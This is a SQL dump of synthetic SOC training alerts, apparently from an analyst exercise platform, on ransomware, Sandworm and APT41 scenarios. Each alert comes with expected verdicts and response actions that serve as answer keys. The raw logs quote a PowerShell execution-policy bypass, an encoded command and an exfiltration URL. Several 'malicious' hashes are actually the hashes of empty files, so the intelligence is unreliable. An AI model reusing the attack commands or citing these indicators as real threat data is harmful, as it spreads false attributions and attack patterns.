'{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"8f14e45fceea167a5a36dedd4bea2543\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Identified as DiskCryptor ransomware.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous ransomware campaigns.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"dcinst.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Local Analysis\",\"verdict\":\"suspicious\",\"details\":\"Common filename used by DiskCryptor ransomware.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"internal\",\"details\":\"User account showing unusual activity.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (523, 'Unauthorized SMB Traffic Observed', 'high', 'Network Traffic Analysis', 'An unauthorized SMB traffic pattern was detected indicating possible lateral movement within the network. The activity was flagged due to the use of known ransomware tactics to spread laterally across the network, utilizing the SMB protocol.', 'Lateral Movement', 'T1021.002', 1, 'new', NULL, '{\"timestamp\":\"2023-10-14T13:45:00Z\",\"event_id\":\"SMB-ALERT-004\",\"source_ip\":\"192.168.1.105\",\"destination_ip\":\"10.0.0.25\",\"attacker_ip\":\"203.0.113.45\",\"protocol\":\"SMB\",\"detected_filename\":\"ransomware_payload.exe\",\"file_hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"user\":\"john_doe\",\"action\":\"File Transfer\",\"status\":\"Suspicious\"}', '2026-01-06 01:39:37', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_monitoring\",\"verdict\":\"internal\",\"details\":\"Internal host involved in suspicious activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_monitoring\",\"verdict\":\"internal\",\"details\":\"Internal host receiving unauthorized SMB traffic.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP linked to ransomware distribution.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"Hash matches known ransomware payload.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"ransomware_payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"file_reputation\",\"verdict\":\"malicious\",\"details\":\"File named associated with ransomware operations.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'intermediate', 'NULL', 1, 0, NULL), (524, 'Encrypted Data Exfiltration Attempt', 'high', 'Data Loss Prevention (DLP) System', 'Anomalous outbound traffic detected from an internal host to a known malicious IP. The traffic pattern suggests an attempt to exfiltrate encrypted files, which could potentially be used for ransom. The files in question were detected on host 192.168.1.23 and attempted to connect to external IP 203.0.113.45.', 'Exfiltration', 'T1041: Exfiltration Over C2 Channel', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:45Z\",\"event_source\":\"DLP System\",\"internal_ip\":\"192.168.1.23\",\"external_ip\":\"203.0.113.45\",\"detected_files\":[{\"filename\":\"confidential_data.enc\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}],\"username\":\"jsmith\",\"action\":\"attempted_exfiltration\",\"network_protocol\":\"HTTPS\",\"file_size\":\"15MB\"}', '2026-01-06 01:39:37', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel_feed\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with data exfiltration activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"suspicious\",\"details\":\"Hash corresponds to encrypted file detected during exfiltration attempt.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"confidential_data.enc\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_dlp\",\"verdict\":\"suspicious\",\"details\":\"Filename indicative of sensitive encrypted data.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jsmith\",\"is_critical\":false,\"osint_result\":{\"source\":\"employee_directory\",\"verdict\":\"clean\",\"details\":\"Username of the individual using the compromised host.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (525, 'Initial Breach Detected: Unauthorized Network Access', 'high', 'Network Traffic Analysis', 'The attackers exploited a vulnerability in the event\'s ticketing system to enter the network. This marks the first step in their infiltration, indicating a sophisticated approach to gaining a foothold within the target\'s network.', 'Initial Access', 'T1190 - Exploit Public-Facing Application', 1, 'new', 1, '{\"timestamp\":\"2023-10-15T14:56:23Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.1.2.3\",\"destination_port\":443,\"protocol\":\"HTTPS\",\"request_url\":\"https://event.ticketing.com/login\",\"exploit_used\":\"CVE-2023-XXXX\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"file_name\":\"exploit_payload.bin\",\"username\":\"compromised_user\"}', '2026-01-06 01:44:46', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous APT campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.1.2.3\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal server targeted by initial access.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malware used by Sandworm.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"exploit_payload.bin\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Detection\",\"verdict\":\"suspicious\",\"details\":\"File name commonly used in exploitation attempts.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"User Activity Monitoring\",\"verdict\":\"suspicious\",\"details\":\"Unusual login activity detected.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (526, 'Malicious Script Execution: Ceremony Systems Compromised', 'high', 'Endpoint Detection and Response (EDR)', 'A carefully crafted script was executed on key systems involved in the ceremony, initiating a sequence of disruptions. The script is linked to known Sandworm TTPs, aiming to deploy destructive malware within the ceremony\'s IT infrastructure.', 'Execution', 'T1059.001 - Command and Scripting Interpreter: PowerShell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:35:23Z\",\"hostname\":\"ceremony-server-01\",\"username\":\"admin_ceremony\",\"process\":\"/usr/bin/powershell\",\"command_line\":\"powershell -ExecutionPolicy Bypass -File C:\\\\Users\\\\Public\\\\malicious_script.ps1\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"internal_ip\":\"10.10.5.23\",\"external_ip\":\"185.143.223.101\",\"filename\":\"malicious_script.ps1\",\"process_id\":4721,\"malware_family\":\"Olympic Destroyer\"}', '2026-01-06 01:44:46', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.10.5.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address associated with the compromised server.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"185.143.223.101\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"External IP address associated with known Sandworm operations.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Olympic Destroyer malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"malicious_script.ps1\",\"is_critical\":false,\"osint_result\":{\"source\":\"file_analysis\",\"verdict\":\"suspicious\",\"details\":\"Script file executed on the server, related to the malicious activity.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (527, 'Persistence Mechanism Activated: Backdoors Installed', 'high', 'System Logs', 'The threat actors associated with the Sandworm group have successfully installed backdoors on multiple systems within the network. This action is part of their persistence strategy to maintain access even if initial access vectors are mitigated. The logs indicate suspicious activity from an external IP address linked with known malicious activity.', 'Persistence', 'T1059: Command and Scripting Interpreter', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"event_id\":4625,\"source_ip\":\"185.92.220.33\",\"username\":\"compromised_user\",\"command_executed\":\"powershell -encodedCommand UwBlAHIAdgBpAGMAZQAgAHMAdABhAHIAdAAgAC0AcABhAHIAcwBlAFMAdABhAHIAdAAgAE0AdQBsAHQAaQBzAHQAYQByAHQAZQByACAALQBhAHQAdAByACAAIgBIAEEAVABjAGgAIgA=\",\"file_created\":\"C:\\\\Windows\\\\System32\\\\backdoor.exe\",\"file_hash\":\"2c1743a391305fbf367df8e4f069f9f9\",\"internal_ip\":\"192.168.1.15\"}', '2026-01-06 01:44:46', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.92.220.33\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous Sandworm group activities\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"User account observed in unusual activity\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"2c1743a391305fbf367df8e4f069f9f9\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known backdoor executable\"}},{\"id\":\"artifact_5\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Network Logs\",\"verdict\":\"internal\",\"details\":\"Internal host showing signs of compromise\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (528, 'Lateral Movement: Spreading Through Critical Systems', 'high', 'Internal Network Monitoring', 'The threat actor is engaging in lateral movement within the network, targeting critical systems essential for the ceremony\'s operation. The objective is to identify and disrupt key systems, potentially using malware associated with known destructive campaigns.', 'Lateral Movement', 'T1550: Use Alternate Authentication Material', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:32:11Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.1.10.25\",\"dst_ip\":\"192.168.1.100\",\"src_port\":445,\"dst_port\":135,\"protocol\":\"SMB\",\"username\":\"ceremony_admin\",\"file_accessed\":\"Olympic_Destroyer.exe\",\"file_hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"external_malicious_ip\":\"203.0.113.45\"}', '2026-01-06 01:44:46', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.1.10.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_asset_db\",\"verdict\":\"internal\",\"details\":\"Internal IP address.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_asset_db\",\"verdict\":\"internal\",\"details\":\"Critical internal server.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"Olympic_Destroyer.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel_service\",\"verdict\":\"malicious\",\"details\":\"Known malware associated with Olympic Destroyer campaign.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Olympic Destroyer malware.\"}},{\"id\":\"artifact_5\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel_service\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with Sandworm activity.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'NULL', 1, 0, NULL), (529, 'Data Exfiltration: Sensitive Information Targeted', 'high', 'Data Loss Prevention (DLP)', 'In a final move, data is exfiltrated, possibly containing sensitive information that can be leveraged in future operations or sold on the black market. The threat actor utilized a compromised internal server to transmit sensitive documents to an external IP address.', 'Exfiltration', 'T1048 - Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:08Z\",\"internal_source_ip\":\"192.168.45.22\",\"external_destination_ip\":\"203.0.113.57\",\"user\":\"jdoe\",\"exfiltrated_files\":[\"confidential_report.pdf\",\"financial_summary.xlsx\"],\"malware_hash\":\"4a8a08f09d37b73795649038408b5f33\",\"protocol\":\"HTTPS\",\"destination_port\":443,\"alert_id\":\"DLP-EXFIL-20231015-001\",\"detected_by\":\"Company DLP System\",\"associated_campaign\":\"Olympic Destroyer\"}', '2026-01-06 01:44:46', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.57\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known exfiltration attempts by Sandworm APT\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.45.22\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network Monitoring\",\"verdict\":\"internal\",\"details\":\"Compromised internal server used for data exfiltration\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"4a8a08f09d37b73795649038408b5f33\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Malware hash associated with Sandworm campaigns\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"confidential_report.pdf\",\"is_critical\":true,\"osint_result\":{\"source\":\"Data Loss Prevention Logs\",\"verdict\":\"suspicious\",\"details\":\"File flagged during exfiltration attempt\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (530, 'Initial Access: ASUS Update Utility Compromised', 'critical', 'Network Traffic Analysis', 'APT41 has compromised the ASUS Live Update utility, enabling malware distribution via a supply chain attack. This can potentially allow the threat actor to infiltrate systems that use the ASUS update service.', 'Supply Chain Attack', 'T1195.002', 1, 'Closed', 68, '{\"timestamp\":\"2023-10-25T14:23:05Z\",\"event_type\":\"network_connection\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"203.0.113.5\",\"destination_port\":443,\"protocol\":\"HTTPS\",\"file_name\":\"ASUSUpdate.exe\",\"file_hash\":\"3a2f4e6d2b2a4f5c6f9e8b7e4c1d2f3e\",\"user\":\"jsmith\",\"action\":\"connection_attempt\",\"status\":\"success\",\"direction\":\"outbound\"}', '2026-01-06 02:36:36', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Source IP is from an internal network range.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel_feeds\",\"verdict\":\"malicious\",\"details\":\"Destination IP is associated with APT41 activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3a2f4e6d2b2a4f5c6f9e8b7e4c1d2f3e\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"malicious\",\"details\":\"File hash corresponds to a known variant of malware used in ASUS supply chain attacks.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"ASUSUpdate.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"vendor_security_advisory\",\"verdict\":\"suspicious\",\"details\":\"File name is associated with the compromised ASUS update utility.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'NULL', 1, 0, NULL); INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`) VALUES (531, 'Execution: Malicious Payload Deployment', 'high', 'Endpoint Detection and Response', 'The infected update utility executes the malicious payload on target machines, setting the stage for further exploitation.', 'Malware Execution', 'T1059: Command and Scripting Interpreter', 1, 'Closed', 68, '{\"timestamp\":\"2023-10-05T14:22:39Z\",\"event_id\":\"E123456\",\"source_ip\":\"203.0.113.15\",\"internal_ip\":\"192.168.1.45\",\"user\":\"jdoe\",\"process_name\":\"update.exe\",\"file_path\":\"C:\\\\Program Files\\\\Update\\\\update.exe\",\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"action\":\"execute\",\"description\":\"Malicious payload executed by compromised update utility.\",\"os\":\"Windows 10\",\"username\":\"jdoe\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\"}', '2026-01-06 02:36:36', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"Known to be associated with APT41 activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Associated with malware used in APT41 operations.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"clean\",\"details\":\"User account of the compromised system.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (532, 'Persistence: Establishing Backdoor Access', 'high', 'System Logs', 'APT41 has successfully installed a backdoor on the targeted system to ensure continued access. The backdoor was detected through analysis of system logs, indicating a connection to a known malicious IP and the presence of a suspicious executable file in the system.', 'Backdoor Installation', 'T1078 - Valid Accounts', 1, 'Closed', 68, '{\"timestamp\":\"2023-10-11T15:23:45Z\",\"event_id\":\"4625\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.15\",\"username\":\"compromised_user\",\"process_name\":\"C:\\\\Windows\\\\System32\\\\backdoor.exe\",\"process_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"action\":\"Execution\",\"status\":\"Failed Logon\",\"logon_type\":\"3\",\"authentication_package\":\"NTLM\",\"network_address\":\"10.0.0.55\",\"logon_guid\":\"{12345678-1234-5678-1234-567812345678}\"}', '2026-01-06 02:36:36', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known APT41 associated IP address.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Inventory\",\"verdict\":\"internal\",\"details\":\"Corporate workstation.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal User Database\",\"verdict\":\"suspicious\",\"details\":\"Account used in multiple logon attempts.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis\",\"verdict\":\"malicious\",\"details\":\"Hash associated with backdoor executable.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (533, 'Lateral Movement: Expanding Network Footprint', 'high', 'User Behavior Analytics', 'Using stolen credentials, the attackers move laterally across the network to identify high-value targets. This step involves credential dumping to facilitate further infiltration into the network.', 'Credential Dumping', 'T1003', 1, 'new', 68, '{\"timestamp\":\"2023-10-15T14:48:00Z\",\"event_id\":\"4625\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.15.23\",\"username\":\"jdoe\",\"process_name\":\"lsass.exe\",\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"event_description\":\"Failed login attempt detected. Potential credential dumping via lsass.exe process.\",\"host\":\"WIN-SERVER01\",\"detected_by\":\"User Behavior Analytics\",\"file_path\":\"C:\\\\Windows\\\\System32\\\\lsass.exe\"}', '2026-01-06 02:36:36', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"IP Reputation Database\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with previous attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.15.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of targeted host.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"User account used in unusual access pattern.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Hash Registry\",\"verdict\":\"malicious\",\"details\":\"Hash belongs to a known credential dumping tool.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (534, 'Exfiltration: Data Harvesting', 'high', 'Data Loss Prevention', 'APT41 begins exfiltrating data from compromised systems, focusing on valuable intellectual property and sensitive user data.', 'Data Exfiltration', 'T1020: Automated Exfiltration', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:22:30Z\",\"event_source\":\"Data Loss Prevention\",\"src_ip\":\"10.20.30.40\",\"dst_ip\":\"203.0.113.45\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"file_name\":\"Sensitive_Project_Documents.zip\",\"user\":\"jdoe\",\"action\":\"file_transfer\",\"protocol\":\"HTTPS\",\"destination_url\":\"https://malicious-site.example.com/upload\",\"external_ip\":\"203.0.113.45\",\"internal_ip\":\"10.20.30.40\"}', '2026-01-06 02:36:36', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT41 infrastructure.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known APT41 exfiltration tool.\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"https://malicious-site.example.com/upload\",\"is_critical\":true,\"osint_result\":{\"source\":\"Domain Reputation Service\",\"verdict\":\"malicious\",\"details\":\"URL used for data exfiltration by APT41.\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"10.20.30.40\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Database\",\"verdict\":\"internal\",\"details\":\"Internal IP of compromised host.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'NULL', 1, 0, NULL), (535, 'Target Identification: Specific MAC Addresses', 'high', 'Threat Intelligence Feeds', 'The attackers are utilizing malware to identify and target specific MAC addresses, indicating a precise strike within the broader attack. This operation highlights the advanced capabilities of APT41 in conducting targeted attacks.', 'Targeted Attack', 'T1087 - Account Discovery', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:45:32Z\",\"source_ip\":\"203.0.113.5\",\"destination_ip\":\"10.0.0.45\",\"malware_hash\":\"3f1d8e5c4a7e2eefb9f0a7f8d7c4d3c1\",\"malware_filename\":\"CCleaner_v5.33.exe\",\"target_mac\":\"00:1A:2B:3C:4D:5E\",\"user\":\"jdoe\",\"action\":\"Identify\",\"result\":\"Specific MAC address identified within infected network\",\"attack_type\":\"Supply Chain Attack\"}', '2026-01-06 02:36:36', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Shodan\",\"verdict\":\"malicious\",\"details\":\"IP associated with past APT41 